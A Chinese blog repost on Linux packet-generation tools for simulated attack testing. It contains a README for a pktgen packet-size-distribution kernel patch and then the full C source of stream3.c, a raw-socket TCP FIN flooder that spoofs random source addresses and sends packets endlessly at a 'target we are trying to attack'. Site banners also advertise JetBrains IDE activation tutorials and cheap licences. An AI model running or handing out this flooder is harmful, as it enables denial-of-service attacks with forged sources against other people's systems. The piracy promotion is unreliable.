linux网络发包工具_web抓包工具

linux网络发包工具_web抓包工具如果想做模仿网络攻击的测试,选择高速小包发送工具,最好还是可以指定协议的。当然,我们研究这些可不是打算用来攻击他人的机器,搞网络破坏的,而是用来通过该方法测试收数据体验一下被攻击的感觉,哈哈,也顺便衡量一下机器的性能。这方面smartbit测试仪可以完全可以满足。可惜啊,一台都得好几十万,对于大多数人来说都不太划算。那么还有没有软件的发包工具可以实现高速按指定协议发送数据包啊?!有。还是要归功于l

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

    如果想做模仿网络攻击的测试,选择高速小包发送工具,最好还是可以指定协议的。当然,我们研究这些可不是打算用来攻击他人的机器,搞网络破坏的,而是用来通过该方法测试收数据体验一下被攻击的感觉,哈哈,也顺便衡量一下机器的性能。这方面smartbit测试仪可以完全可以满足。可惜啊,一台都得好几十万,对于大多数人来说都不太划算。那么还有没有软件的发包工具可以实现高速按指定协议发送数据包啊?!有。还是要归功于linux的开源精神的许多网络黑客的无私奉献。我们可以采用linux内核自带的发包工具pktgen,或者经常被用来进行网络攻击的stream源代码。
    不过目前stream.c是比较老的版本了,现在我们可以使用改进而来的stream3.c或stream3o.c来完成我们的发包任务,很不错啊,在源码里面修改for循环的次数,就可以指定发包数量。然后编译源码运行,指定自己想要的参数,就可以达到目的了。呵呵!
   The packet size distribution enhancement of the
Linux Kernel Packet Generator:
———————————————————-

Table of Contents:
I.     How it works
II.    How to use the new enhancements
III.    How to install this module
IV.     What i have change in the code

First of all I want to mention that this patch was only tested on a x86
PC with a v2.6.8 Linux Kernel. But please report problems to me:
fabian_at_net.in.tum.de (substitute “_at_” with “@”)

I. How it works:
—————–

When a new packet shall be generated, a new packet size has to be
determined. Therefore we randomly choose an entry of the (so called)
outliers array. This array contains packet size values of those packet
sizes which appear very often in the distribution which shall be
represented. If we read a -1 in this array, none of these packet sizes
is choosen, therefore we need to choose randomly again. But this time we
use another array—the so called histos array. In this array the entrys
are the lowest packet size of the bin which it is representing. For this
reason we need to add random jitter of maximal the width of such a bin
(called hist_width below) to this obtained packet size.

II. How to use the new enhancements:
————————————
   
1. Read the original pktgen.txt

2. The following three new commands for the /proc interface were added:

dist:
    pgset “dist 1000 20 1500 33 75”
   
    This is used to set up the Linux Kernel Packet Generator for excepting
    the distributions entered by the “outl” and “hist” commands. The syntax
    is: dist <precision> <hist_width> <max_pkt_size> <#outliers> <#histos>

    With <precision> the size of the array used for generating the
    different packet sizes is set. This is directly influencing how high
    the resolution of the different entrys is.

    The <hist_width> sets the width of a bin.

    The <max_pkt_size> sets the maximum packet size.

    The <#outliers> and <#histos> define how many lines of “oult” and
    “hist” have to follow until the input distribution is complete.

outl:
    pgset “outl 40 179”
   
    Syntax: outl <pkt_size> <#cells>
  
    This instructs the Generator to fill <#cells> of the outliers array
    with the packet size <pkt_size>

hist:
    pgset “hist 40 91”

    Syntax: hist <pkt_size> <#cells>
  
    This instructs the Generator to fill <#cells> of the histos array
    with the packet size <pkt_size>, to which jitter will be added.

3. To activate the distribution you have to switch the PKTSIZE_REAL flag
    pgset “flag PKTSIZE_REAL”. This will only succeed if the distribution
    is complete and correct, indicated with the DIST_READY flag.

III. How to install this module:
——————————–

1. Download the source code:
    http://www.net.in.tum.de/~schneifa/sources/pktgen-lkpg-dist-0.1.tar.gz

2. unpack the tar archive:
    tar -xvzf pktgen-lkpg-dist-0.1.tar.gz

3. Copy the new pktgen.c over the old:
    cp pktgen-lkpg-dist-0.1/pktgen.c /usr/src/linux/net/core/pktgen.c

4. Compile the new pktgen.c:
    cd /usr/src/linux/net/core
    make -C /usr/src/linux SUBDIRS=$PWD modules

5. Install the new module:
    cd /usr/src/linux
    make modules_install
   
6. use it!

   

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif

struct ip_hdr {

    u_int       ip_hl:4,               
                ip_v:4;                
    u_char      ip_tos;                
    u_short     ip_len;                
    u_short     ip_id;                 
    u_short     ip_off;                
    u_char      ip_ttl;                
    u_char      ip_p;                  
    u_short     ip_sum;                
    u_long      saddr, daddr;          
};

struct tcp_hdr {

    u_short     th_sport;              
    u_short     th_dport;              
    u_long      th_seq;                
    u_long      th_ack;                
    u_int       th_x2:4,               
                th_off:4;              
    u_char      th_flags;              
    u_short     th_win;                
    u_short     th_sum;                
    u_short     th_urp;                
};

struct tcpopt_hdr {

    u_char  type;                      
    u_char  len;                               
    u_short value;                     
};

struct pseudo_hdr {                    
    u_long saddr, daddr;                       
    u_char mbz, ptcl;                  
    u_short tcpl;                      
};

struct packet {

    struct ip ip;
    struct tcphdr tcp;

};

struct cksum {

    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;

void usage(char *progname)
{

    fprintf(stderr, “Usage: %s <dstaddr> <dstport> <pktsize> <pps>\n”,
progname);
    fprintf(stderr, ”    dstaddr  – the target we are trying to attack.\n”);
    fprintf(stderr, ”    dstport  – the port of the target, 0 = random.\n”);
    fprintf(stderr, ”    pktsize  – the extra size to use.  0 = normal syn.\n”);
    exit(1);
}

inline u_short in_cksum(u_short *addr, int len)
{

    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    

     while (nleft > 1)  {

         sum += *w++;
         nleft -= 2;
     }

    
     if (nleft == 1) {

         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     }

    
     sum = (sum >> 16) + (sum & 0xffff);
     sum += (sum >> 16);               
     answer = ~sum;                    
     return(answer);
}

u_long lookup(char *hostname)
{

    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {

       fprintf(stderr, “Could not resolve %s.\n”, hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}

void flooder(void)
{

    struct timespec ts;
    int i;

    memset(&packet, 0, sizeof(packet));

    ts.tv_sec                   = 0;
    ts.tv_nsec                  = 10;

    packet.ip.ip_hl             = 5;
    packet.ip.ip_v              = 4;
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = 0x08;
    packet.ip.ip_id             = rand();
    packet.ip.ip_len            = FIX(sizeof(packet));
    packet.ip.ip_off            = 0;
    packet.ip.ip_ttl            = 255;
    packet.ip.ip_dst.s_addr     = dstaddr;
    packet.ip.ip_src.s_addr     = random();
    packet.ip.ip_sum             = 0;
    packet.tcp.th_sum           = 0;

    packet.tcp.th_win           = htons(16384);
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 5;
    packet.tcp.th_urp           = 0;
    packet.tcp.th_ack         = rand();
    packet.tcp.th_flags     = TH_ACK|TH_FIN;
    packet.tcp.th_sport     = rand();
    packet.tcp.th_dport         = dstport?htons(dstport):rand();

    s_in.sin_family             = AF_INET;
    s_in.sin_port               = packet.tcp.th_dport;
    s_in.sin_addr.s_addr    = dstaddr;

    cksum.pseudo.daddr          = dstaddr;
    cksum.pseudo.saddr        = packet.ip.ip_src.s_addr;
    cksum.pseudo.mbz            = 0;
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = htons(sizeof(struct tcphdr));
    cksum.tcp                   = packet.tcp;

    packet.ip.ip_sum            = in_cksum((void *)&packet.ip, 20);
    packet.tcp.th_sum           = in_cksum((void *)&cksum, sizeof(cksum));

    for(i=0;;++i) {

       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr
*)&s_in, sizeof(s_in)) < 0)
          perror(“jess”);

    }
}

int main(int argc, char *argv[])
{

    int on = 1;

    printf(“stream3.c v0.01 – TCP FIN Packet Flooder\n modified by 3APA3A@security.nnov.ru\n”);

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {

       perror(“socket”);
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) <  0) {

       perror(“setsockopt”);
       exit(1);
    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf(“\nResolving IPs…”); fflush(stdout);

    dstaddr     = lookup(argv[1]);
    dstport     = atoi(argv[2]);
    pktsize     = atoi(argv[3]);

    printf(“Sending…”); fflush(stdout);

    flooder();

    return 0;
}

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/197832.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • PyCharm激活码永久有效PyCharm2020.1.5激活码教程-持续更新,一步到位「建议收藏」

    PyCharm激活码永久有效PyCharm2020.1.5激活码教程-持续更新,一步到位「建议收藏」PyCharm激活码永久有效2020.1.5激活码教程-Windows版永久激活-持续更新,Idea激活码2020.1.5成功激活

    2022年6月19日
    228
  • react中父组件向子组件传值

    react中父组件向子组件传值1.子组件代码:定义props.属性名来接收父组件传递过来的值importReact,{Component}from”react”;exportdefaultclassSonextendsComponent{render(){return<div>我是子组件—{this.props.text}</div>;}}2.父组件代码:在引用子组件时,在子组件身上传递数据(用子组件定义的属性来传递)importR

    2022年5月27日
    34
  • 无锁编程介绍

    无锁编程介绍原文地址:http://preshing.com/20120612/an-introduction-to-lock-free-programming文章目录无锁编程是什么无锁编程技术原子的Read-Modify-Write操作Compare-And-Swap循环顺序一致性内存保序不同的处理器有不同的内存模型参考文献无锁编程是一项挑战,不仅仅是因为自身的复杂性所致,还与初次探索该课题的困难…

    2022年6月10日
    27
  • Ubuntu保存退出vim编辑器「建议收藏」

    Ubuntu保存退出vim编辑器「建议收藏」命令模式,从键盘上输入的任何字符都被作为编辑命令来解释,vi下很多操作如配置编辑器、文本查找和替换、选择文本等都是在命令模式下进行的。输入模式,从键盘上输入的所有字符都被插入到正在编辑的缓冲区中,被当作正文。1.编辑进入vi/vim后按字母“i”或“I”即可进入编辑状态(此时左下角会出现“插入”),另外还可以用a…

    2022年6月11日
    42
  • gridbagconstraints什么意思_java rectangle

    gridbagconstraints什么意思_java rectangle说明:GridBagLayout只有一个无参的构造器,要使用它就必须用setConstraints(Componentcomp,GridBagConstraintsconstraints)将它和GridBagConstraints关联起来!当GridBagLayout与无参的GridBagConstraints关联时,此时它就相当于一个GridLayout,只不过,用GridLayout布局的

    2025年10月15日
    4
  • C语言break和continue

    C语言break和continuebreak用法跳出循环语句(for循环、while循环、do…while循环) 跳出switch语句注意:C语言break只能用于这两种情况。break语句不能用于循环语句和switch语句之外的任何其他语句中,不然编译器会报错。continue用法只用于结束本次循环(for循环、while循环、do…while循环),进行下一次循环注意…

    2022年4月28日
    49

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号